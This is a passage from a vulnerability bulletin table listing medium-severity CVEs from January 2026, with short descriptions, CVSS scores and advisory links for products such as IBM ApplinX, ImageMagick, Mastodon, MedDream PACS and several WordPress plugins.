| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 6.4 | CVE-2025-36408 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 5.4 | CVE-2025-36409 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--ApplinX | IBM ApplinX 11.1 could disclose sensitive information about server architecture that could aid in further attacks against the system. | 2026-01-20 | 5.3 | CVE-2025-36419 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--Aspera Console | IBM Aspera Console 3.4.7 stores potentially sensitive information in log files that could be read by a local privileged user. | 2026-01-20 | 4.9 | CVE-2025-13925 | https://www.ibm.com/support/pages/node/7256544 |
| IBM--Business Automation Workflow containers | IBM Business Automation Workflow containers 25.0.0 through 25.0.0 Interim Fix 002, 24.0.1 through 24.0.1 Interim Fix 005, and 24.0.0 through 24.0.0 Interim Fix 006. IBM Cloud Pak for Business Automation and IBM Business Automation Workflow containers may disclose sensitve configuration information in a config map. | 2026-01-20 | 5.5 | CVE-2025-36058 | https://www.ibm.com/support/pages/node/7256777 |
| IBM--Business Automation Workflow containers | IBM Business Automation Workflow containers 25.0.0 through 25.0.0 Interim Fix 002, 24.0.1 through 24.0.1 Interim Fix 005, and 24.0.0 through 24.0.0 Interim Fix 006. IBM Cloud Pak for Business Automation could allow a local user with access to the container to execute OS system calls. | 2026-01-20 | 4.7 | CVE-2025-36059 | https://www.ibm.com/support/pages/node/7256777 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory. | 2026-01-20 | 5.9 | CVE-2025-1719 | https://www.ibm.com/support/pages/node/7257006 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory. | 2026-01-20 | 5.9 | CVE-2025-1722 | https://www.ibm.com/support/pages/node/7257006 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 does not invalidate session after a logout which could allow an authenticated user to impersonate another user on the system. | 2026-01-20 | 6.3 | CVE-2025-36063 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 does not invalidate session after a browser closure which could allow an authenticated user to impersonate another user on the system. | 2026-01-20 | 6.3 | CVE-2025-36065 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 6.1 | CVE-2025-36066 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.00 through 5.2.0.12 does not disallow the session id after use which could allow an authenticated user to impersonate another user on the system. | 2026-01-20 | 6.3 | CVE-2025-36115 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 5.4 | CVE-2025-36113 | https://www.ibm.com/support/pages/node/7257244 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. The BilateralBlurImage method will allocate a set of double buffers inside AcquireBilateralTLS. But, in versions prior to 7.1.2-13, the last element in the set is not properly initialized. This will result in a release of an invalid pointer inside DestroyBilateralTLS when the memory allocation fails. Version 7.1.2-13 contains a patch for the issue. | 2026-01-20 | 6.5 | CVE-2026-22770 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-39h3-g67r-7g3c https://github.com/ImageMagick/ImageMagick/commit/3e0330721020e0c5bb52e4b77c347527dd71658e |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Versions 14.10.1 and below have a NULL pointer dereference vulnerability in the MSL (Magick Scripting Language) parser when processing <comment> tags before images are loaded. This can lead to DoS attack due to assertion failure (debug builds) or NULL pointer dereference (release builds). This issue is fixed in version 14.10.2. | 2026-01-22 | 6.5 | CVE-2026-23952 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5vx3-wx4q-6cj8 https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Versions prior to 7.1.2-13 have a stack overflow via infinite recursion in MSL (Magick Scripting Language) `<write>` command when writing to MSL format. Version 7.1.2-13 fixes the issue. | 2026-01-20 | 5.5 | CVE-2026-23874 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9vj4-wc7r-p844 |
| iqonicdesign--KiviCare Clinic & Patient Management System (EHR) | The KiviCare - Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization checks in the uploadMedicalReport() function in all versions up to, and including, 3.6.15. This makes it possible for unauthenticated attackers to upload text files and PDF documents to the affected site's server which may be leveraged for further attacks such as hosting malicious content or phishing pages via PDF files. | 2026-01-23 | 5.3 | CVE-2026-0927 | https://www.wordfence.com/threat-intel/vulnerabilities/id/489931ef-bac3-4de8-84ec-6f226d96f778?source=cve https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php#L1328 https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/tags/3.6.15/app/controllers/KCAppointmentController.php#L1328 https://plugins.trac.wordpress.org/changeset/3443088/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php |
| itsourcecode--Society Management System | A vulnerability was identified in itsourcecode Society Management System 1.0. This affects an unknown function of the file /admin/expenses.php. The manipulation of the argument detail leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-01-19 | 4.3 | CVE-2026-1134 | VDB-341724 | itsourcecode Society Management System expenses.php cross site scripting VDB-341724 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735156 | itsourcecode Society Management System V1.0 cross site scripting https://github.com/TEhS411/cve/issues/7 https://itsourcecode.com/ |
| itsourcecode--Society Management System | A security flaw has been discovered in itsourcecode Society Management System 1.0. This impacts an unknown function of the file /admin/activity.php. The manipulation of the argument Title results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 4.3 | CVE-2026-1135 | VDB-341725 | itsourcecode Society Management System activity.php cross site scripting VDB-341725 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735157 | itsourcecode Society Management System V1.0 cross site scripting https://github.com/TEhS411/cve/issues/8 https://itsourcecode.com/ |
| jamiesage123--MyBB Thread Redirect Plugin | MyBB Thread Redirect Plugin 0.2.1 contains a cross-site scripting vulnerability in the custom text input field for thread redirects. Attackers can inject malicious SVG scripts that will execute when other users view the thread, allowing arbitrary script execution. | 2026-01-23 | 6.1 | CVE-2018-25116 | ExploitDB-49505 Thread Redirect Plugin GitHub Repository VulnCheck Advisory: MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting |
| kohler--hotcrp | HotCRP is conference review software. Starting in commit aa20ef288828b04550950cf67c831af8a525f508 and prior to commit ceacd5f1476458792c44c6a993670f02c984b4a0, authors with at least one submission on a HotCRP site could use the document API to download any documents (PDFs, attachments) associated with any submission. The problem was patched in commit ceacd5f1476458792c44c6a993670f02c984b4a0. | 2026-01-19 | 6.5 | CVE-2026-23878 | https://github.com/kohler/hotcrp/security/advisories/GHSA-vh3x-xwj4-jvqx https://github.com/kohler/hotcrp/commit/aa20ef288828b04550950cf67c831af8a525f508 https://github.com/kohler/hotcrp/commit/ceacd5f1476458792c44c6a993670f02c984b4a0 |
| kometschuh--Same Category Posts | The Same Category Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget title placeholder functionality in all versions up to, and including, 1.1.19. This is due to the use of `htmlspecialchars_decode()` on taxonomy term names before output, which decodes HTML entities that WordPress intentionally encodes for safety. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 5.4 | CVE-2025-14797 | https://www.wordfence.com/threat-intel/vulnerabilities/id/70434876-4876-4da8-9af1-6f6ef5632f26?source=cve https://plugins.trac.wordpress.org/browser/same-category-posts/tags/1.1.19/same-category-posts.php#L665 https://plugins.trac.wordpress.org/browser/same-category-posts/tags/1.1.19/same-category-posts.php#L639 https://plugins.trac.wordpress.org/browser/same-category-posts/tags/1.1.19/same-category-posts.php#L707 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444428%40same-category-posts&new=3444428%40same-category-posts&sfp_email=&sfph_mail= |
| leadbi--LeadBI Plugin for WordPress | The LeadBI Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_id' parameter of the 'leadbi_form' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1189 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3a196eaa-64c7-447b-9384-b58fcba57ec0?source=cve https://wordpress.org/plugins/leadbi/ https://plugins.trac.wordpress.org/browser/leadbi/trunk/includes/Plugin.php#L72 https://plugins.trac.wordpress.org/browser/leadbi/tags/1.7/includes/Plugin.php#L72 |
| legalweb--WP DSGVO Tools (GDPR) | The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lw_content_block' shortcode in all versions up to, and including, 3.1.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-23 | 6.4 | CVE-2026-0914 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4474c79b-f93a-4725-8345-ad5c5260913c?source=cve https://plugins.trac.wordpress.org/browser/shapepress-dsgvo/tags/3.1.35/public/shortcodes/content-block-shortcode.php#L17 https://plugins.trac.wordpress.org/changeset/3440083/ |
| lovor--Cookie consent for developers | The Cookie consent for developers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple settings fields in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1084 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c16918a9-7b73-418d-adbd-aa17cb1d8cf8?source=cve https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/trunk/admin/class-ntg-cookie-consent-admin.php#L112 https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/trunk/admin/partials/ntg-cookie-consent-admin-display.php#L108 https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/tags/1.7.1/admin/class-ntg-cookie-consent-admin.php#L112 https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/tags/1.7.1/admin/partials/ntg-cookie-consent-admin-display.php#L108 |
| magazine3--Schema & Structured Data for WP & AMP | The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'saswp_custom_schema_field' profile field in all versions up to, and including, 1.54 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-23 | 6.4 | CVE-2025-14069 | https://www.wordfence.com/threat-intel/vulnerabilities/id/651a7036-d421-41b7-91db-102e60d8274e?source=cve https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.53/admin_section/common-function.php#L1874 https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.53/admin_section/structure-admin.php#L2605 https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.53/output/function.php#L171 https://plugins.trac.wordpress.org/changeset/3441582/schema-and-structured-data-for-wp/trunk?contextall=1&old=3429983&old_path=%2Fschema-and-structured-data-for-wp%2Ftrunk#file0 |
| mainichiweb--Friendly Functions for Welcart | The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the settings page. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1208 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6cc709e0-870b-4d12-9ac8-55da498768a1?source=cve https://plugins.trac.wordpress.org/browser/friendly-functions-for-welcart/tags/1.2.5/ffw_function_settings.php#L53 https://plugins.trac.wordpress.org/browser/friendly-functions-for-welcart/tags/1.2.5/ffw_function_settings.php#L58 https://plugins.trac.wordpress.org/changeset/3445305/ |
| marcinlawrowski--Wise Analytics | The Wise Analytics plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.9. This is due to missing capability checks on the REST API endpoint '/wise-analytics/v1/report'. This makes it possible for unauthenticated attackers to access sensitive analytics data including administrator usernames, login timestamps, visitor tracking information, and business intelligence data via the 'name' parameter granted they can send unauthenticated requests. | 2026-01-24 | 5.3 | CVE-2025-14609 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d92c80cb-080b-4774-8c66-1d5cf68e771f?source=cve https://plugins.trac.wordpress.org/browser/wise-analytics/trunk/src/Endpoints/ReportsEndpoint.php#L43 https://plugins.trac.wordpress.org/browser/wise-analytics/tags/1.1.9/src/Endpoints/ReportsEndpoint.php#L43 |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, an insecure direct object reference in the web push subscription update endpoint lets any authenticated user update another user's push subscription by guessing or obtaining the numeric subscription id. This can be used to disrupt push notifications for other users and also leaks the web push subscription endpoint. Any user with a web push subscription is impacted, because another authenticated user can tamper with their push subscription settings if they can guess or obtain the subscription id. This allows an attacker to disrupt push notifications by changing the policy (whether to filter notifications from non-followers or non-followed users) and subscribed notification types of their victims. Additionally, the endpoint returns the subscription object, which includes the push notification endpoint for this subscription, but not its keypair. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 6.5 | CVE-2026-23964 | https://github.com/mastodon/mastodon/security/advisories/GHSA-f3q8-7vw3-69v4 https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon allows server administrators to suspend remote users to prevent interactions. However, some logic errors allow already-known posts from such suspended users to appear in timelines if boosted. Furthermore, under certain circumstances, previously-unknown posts from suspended users can be processed. This issue allows old posts from suspended users to occasionally end up on timelines on all Mastodon versions. Additionally, on Mastodon versions from v4.5.0 to v4.5.4, v4.4.5 to v4.4.11, v4.3.13 to v4.3.17, and v4.2.26 to v4.2.29, remote suspended users can partially bypass the suspension to get new posts in. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 5.3 | CVE-2026-23961 | https://github.com/mastodon/mastodon/security/advisories/GHSA-5h2f-wg8j-xqwp https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, the server does not enforce a maximum length for the names of lists or filters, or for filter keywords, allowing any user to set an arbitrarily long string as the name or keyword. Any local user can abuse the list or filter fields to cause disproportionate storage and computing resource usage. They can additionally cause their own web interface to be unusable, although they must intentionally do this to themselves or unknowingly approve a malicious API client. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 4.3 | CVE-2026-23963 | https://github.com/mastodon/mastodon/security/advisories/GHSA-6x3w-9g92-gvf3 https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the ldapUser functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-36556 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2272 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the sendOruReport functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-44000 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2270 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the fetchPriorStudies functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-46270 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2258 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the downloadZip functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious url can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-53516 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2254 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyTranscript functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-53707 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2267 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyHL7Route functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-53854 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2265 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54157 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2256 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the emailfailedjob functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious url can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54495 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2255 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the existingUser functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54778 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2257 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyAutopurgeFilter functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54814 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2261 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the autoPurge functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious url can lead to arbitrary javascript code execution. An attacker can provide a URL to a malicious website to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54817 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2253 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyAeTitle functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54852 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2260 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyUser functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54853 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2268 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyCoercion functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54861 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2262 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyAnonymize functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-55071 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2259 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the notifynewstudy functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-57786 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2269 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyRoute functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-57787 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2266 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyEmail functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-57881 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2263 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyHL7App functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-58080 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2264 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the status parameter. | 2026-01-20 | 6.1 | CVE-2025-58087 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the archivedir parameter. | 2026-01-20 | 6.1 | CVE-2025-58088 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the longtermdir parameter. | 2026-01-20 | 6.1 | CVE-2025-58089 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the uploaddir parameter. | 2026-01-20 | 6.1 | CVE-2025-58090 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the thumbnaildir parameter. | 2026-01-20 | 6.1 | CVE-2025-58091 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the phpexe parameter. | 2026-01-20 | 6.1 | CVE-2025-58092 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the phpdir parameter. | 2026-01-20 | 6.1 | CVE-2025-58093 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the worklistsrc parameter. | 2026-01-20 | 6.1 | CVE-2025-58094 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the imagedir parameter. | 2026-01-20 | 6.1 | CVE-2025-58095 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| mehtevas--Responsive Header Plugin | The Responsive Header plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple plugin settings parameters in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1300 | https://www.wordfence.com/threat-intel/vulnerabilities/id/30821418-48c0-4bc6-8bf1-f558671bff24?source=cve https://downloads.wordpress.org/plugin/responsive-header.1.0.zip https://wordpress.org/plugins/responsive-header/ https://plugins.trac.wordpress.org/browser/responsive-header/trunk/rhp-settings.php#L103 https://plugins.trac.wordpress.org/browser/responsive-header/tags/1.0/rhp-settings.php#L103 |
| Mfscripts--YetiShare File Hosting Script | YetiShare File Hosting Script 5.1.0 contains a server-side request forgery vulnerability that allows attackers to read local system files through the remote file upload feature. Attackers can exploit the url parameter in the url_upload_handler endpoint to access sensitive files like /etc/passwd by using file:/// protocol. | 2026-01-23 | 4 | CVE-2021-47899 | ExploitDB-49534 Vendor Homepage Software Product Page VulnCheck Advisory: YetiShare File Hosting Script 5.1.0 Remote File Upload SSRF Vulnerability |
| MineAdmin--MineAdmin | A vulnerability was identified in MineAdmin 1.x/2.x. The impacted element is an unknown function of the file /system/cache/view of the component View Interface. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 6.3 | CVE-2026-1193 | VDB-341778 | MineAdmin View view improper authorization VDB-341778 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734270 | MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x Logical flaw and vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/6 |
